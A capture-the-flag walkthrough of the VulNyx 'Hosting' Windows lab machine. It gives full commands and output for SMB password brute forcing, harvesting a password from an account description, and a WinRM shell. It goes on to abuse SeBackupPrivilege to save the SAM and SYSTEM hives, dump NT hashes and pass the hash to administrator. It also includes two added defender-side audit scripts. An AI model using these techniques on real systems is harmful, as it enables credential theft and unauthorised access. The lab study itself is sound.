VulNyx - Hosting
Information
Hosting is an easy-difficulty vulnerable Windows virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox hypervisor.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 12:22 CEST
Nmap scan report for 192.168.1.58
Host is up (0.00026s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
❯ nmap -sVC -p80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670 192.168.1.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 12:23 CEST
Nmap scan report for 192.168.1.58
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:7D:4A:B2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-05T10:26:25
|_ start_date: N/A
|_nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7d:4a:b2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (j.wilson)
80/TCP (HTTP)
Site (/)

Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.58/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.58/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed (Status: 301) [Size: 160] [--> http://192.168.1.58/speed/]
/Speed (Status: 301) [Size: 160] [--> http://192.168.1.58/Speed/]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Site (/speed)

In the TEAM section of the navbar, I find several possible usernames

I extract the possible usernames and build a user wordlist for later attacks
❯ curl -sX GET "http://192.168.1.58/speed/" | html2text | grep '@' | cut -d '@' -f 1 | tee users.dic
p.smith
a.krist
m.faeny
k.lendy
445/TCP (SMB)
Basic Enumeration
❯ netexec smb 192.168.1.58
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
Shares
Null Session (Failed)
❯ smbclient -NL //192.168.1.58
session setup failed: NT_STATUS_ACCESS_DENIED
❯ smbmap --no-banner -H 192.168.1.58 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (192.168.1.58) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
❯ netexec smb 192.168.1.58 -u '' -p '' --shares
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\: STATUS_ACCESS_DENIED
SMB 192.168.1.58 445 HOSTING [-] Error enumerating shares: Error occurs while reading from remote(104)
RPC
Null Session (Failed)
❯ rpcclient -NU "" 192.168.1.58 -c "srvinfo"
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
Password Brute Force
With a list of users in hand, I try to obtain a password with netexec and succeed with the credentials: p.smith:kissme
❯ netexec smb 192.168.1.58 -u p.smith -p /opt/techyou.txt
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:eduardo STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:andres STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:courtney STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:booboo STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [+] HOSTING\p.smith:kissme
Validating the credentials of the user p.smith, I see that they are valid over SMB but not over WinRM
(The user p.smith is possibly not a member of the Remote Management Users group)
❯ netexec smb 192.168.1.58 -u 'p.smith' -p 'kissme' 2>/dev/null
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [+] HOSTING\p.smith:kissme
❯ netexec winrm 192.168.1.58 -u 'p.smith' -p 'kissme' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [-] HOSTING\p.smith:kissme
RPC
Auth
I find new users, and in the description of the user m.davis I obtain the password H0$T1nG123!
❯ rpcclient -U "p.smith%kissme" 192.168.1.58 -c "querydispinfo and enumdomusers"
index: 0x1 RID: 0x1f4 acb: 0x00000211 Account: Administrador Name: (null) Desc: (null)
index: 0x2 RID: 0x3ea acb: 0x00000214 Account: administrator Name: Administrator Desc: (null)
index: 0x3 RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: (null)
index: 0x4 RID: 0x3ec acb: 0x00000214 Account: f.miller Name: Frank Miller Desc: (null)
index: 0x5 RID: 0x1f5 acb: 0x00000215 Account: Invitado Name: (null) Desc: (null)
index: 0x6 RID: 0x3ee acb: 0x00000214 Account: j.wilson Name: John Wilson Desc: (null)
index: 0x7 RID: 0x3ed acb: 0x00000214 Account: m.davis Name: Mike Davis Desc: H0$T1nG123!
index: 0x8 RID: 0x3eb acb: 0x00000214 Account: p.smith Name: Paul Smith Desc: (null)
index: 0x9 RID: 0x1f8 acb: 0x00000011 Account: WDAGUtilityAccount Name: (null) Desc: (null)
❯ rpcclient -U "p.smith%kissme" 192.168.1.58 -c "enumdomusers" | grep -oP '\[.*?\]' | tr -d '[]' | grep -v '0x' >> users.dic
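The finding above comes down to a secret stored in an account description that any authenticated user can read. As an added example (not part of the original writeup), this defender-side check parses `querydispinfo` rows and flags descriptions that look like passwords; the `looks_like_secret` heuristic and all function names are assumptions of this example.

```python
import re

# Rows copied from the rpcclient querydispinfo output above.
DISPINFO_SAMPLE = """\
index: 0x4 RID: 0x3ec acb: 0x00000214 Account: f.miller Name: Frank Miller Desc: (null)
index: 0x5 RID: 0x1f5 acb: 0x00000215 Account: Invitado Name: (null) Desc: (null)
index: 0x7 RID: 0x3ed acb: 0x00000214 Account: m.davis Name: Mike Davis Desc: H0$T1nG123!
index: 0x9 RID: 0x1f8 acb: 0x00000011 Account: WDAGUtilityAccount Name: (null) Desc: (null)
"""

# SAMR account-control bits as printed in the acb field.
ACB_DISABLED, ACB_PWNOTREQ, ACB_PWNOEXP = 0x0001, 0x0004, 0x0200

ROW = re.compile(
    r"RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)"
    r"\s+Name:\s*(.*?)\s+Desc:\s*(.*)$",
    re.IGNORECASE,
)
CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")

def looks_like_secret(desc):
    """Heuristic: one token of 8+ characters mixing at least 3 character classes."""
    desc = desc.strip()
    if desc == "(null)" or " " in desc or len(desc) < 8:
        return False
    return sum(bool(re.search(c, desc)) for c in CHAR_CLASSES) >= 3

def audit_descriptions(text):
    """Return one finding per account whose description looks like a password."""
    findings = []
    for line in text.splitlines():
        m = ROW.search(line)
        if not m:
            continue
        rid, acb, account, _name, desc = m.groups()
        acb = int(acb, 16)
        if looks_like_secret(desc):
            findings.append({
                "account": account,
                "rid": int(rid, 16),
                "enabled": not acb & ACB_DISABLED,
                "password_not_required": bool(acb & ACB_PWNOTREQ),
                "password_never_expires": bool(acb & ACB_PWNOEXP),
            })
    return findings

if __name__ == "__main__":
    for finding in audit_descriptions(DISPINFO_SAMPLE):
        print(finding)
```

The decoded acb bits show why the exposure matters here: the flagged account is enabled and its password never expires.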
User Brute Force
I verify that the password H0$T1nG123! belongs to the user j.wilson
❯ netexec smb 192.168.1.58 -u users.dic -p 'H0$T1nG123!' --ignore-pw-decoding
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\administrator:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
❯ netexec smb 192.168.1.58 -u j.wilson -p 'H0$T1nG123!'
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
5985/TCP (WINRM)
I validate the credentials and access the system as the user j.wilson
❯ netexec winrm 192.168.1.58 -u j.wilson -p 'H0$T1nG123!' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)
❯ evil-winrm -i 192.168.1.58 -u j.wilson -p 'H0$T1nG123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami ; hostname
hosting\j.wilson
HOSTING
Privilege Escalation
Enumeration
Privileges
The user j.wilson holds the SeBackupPrivilege privilege
*Evil-WinRM* PS C:\> whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= =================================================== ==========
SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege Restaurar archivos y directorios Habilitada
SeShutdownPrivilege Apagar el sistema Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeTimeZonePrivilege Cambiar la zona horaria Habilitada
Abuse
SAM & SYSTEM
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> reg save HKLM\SAM sam ; reg save HKLM\SYSTEM system
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> ls
Directorio: C:\Users\j.wilson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/5/2025 1:26 PM 57344 sam
-a---- 8/5/2025 1:26 PM 11980800 system
-a---- 9/2/2024 7:14 PM 70 user.txt
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> download sam
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> download system
Dump (NT Hash)
❯ impacket-secretsdump -system system -sam sam LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
[*] Cleaning up...
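The dump above also shows two password-hygiene problems a defender can audit for: accounts with no password set, and accounts that share one NT hash. As an added example (not part of the original writeup), this script reports both from `uid:rid:lmhash:nthash` lines without printing any hash; the function names are assumptions of this example.

```python
import re
from collections import defaultdict

# NT hash of the empty string: the account has no password set.
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Lines copied from the secretsdump output above.
SAM_SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
"""

def parse_sam_lines(text):
    """Yield (user, rid, nthash) for well-formed rows, skipping banner lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if (len(parts) >= 4 and parts[1].isdigit()
                and re.fullmatch(r"[0-9a-fA-F]{32}", parts[3])):
            yield parts[0], int(parts[1]), parts[3].lower()

def audit_hashes(text):
    """Group accounts by NT hash; report blank passwords and shared passwords."""
    by_hash = defaultdict(list)
    blank = []
    for user, _rid, nt in parse_sam_lines(text):
        if nt == BLANK_NT:
            blank.append(user)
        else:
            by_hash[nt].append(user)
    shared = sorted(sorted(users) for users in by_hash.values() if len(users) > 1)
    return {"blank": sorted(blank), "shared": shared}

if __name__ == "__main__":
    report = audit_hashes(SAM_SAMPLE)
    print("No password set:", ", ".join(report["blank"]))
    for group in report["shared"]:
        print("Same password:", ", ".join(group))
```

On this host it reports f.miller and m.davis as sharing one password, in addition to the three built-in accounts with none set.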
PassTheHash (PtH)
I validate the credentials with the obtained hash and log in as the user administrator
❯ netexec winrm 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [+] HOSTING\administrator:41186fb28e283ff758bb3dbeb6fb4a5c (Pwn3d!)
❯ evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami ; hostname
hosting\administrator
HOSTING
Flags
Now, as the user administrator, I can read the user.txt and root.txt flags
*Evil-WinRM* PS C:\> type c:\users\j.wilson\desktop\user.txt
50e*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
992*****************************
That concludes the walkthrough of the Hosting machine.
Happy Hacking!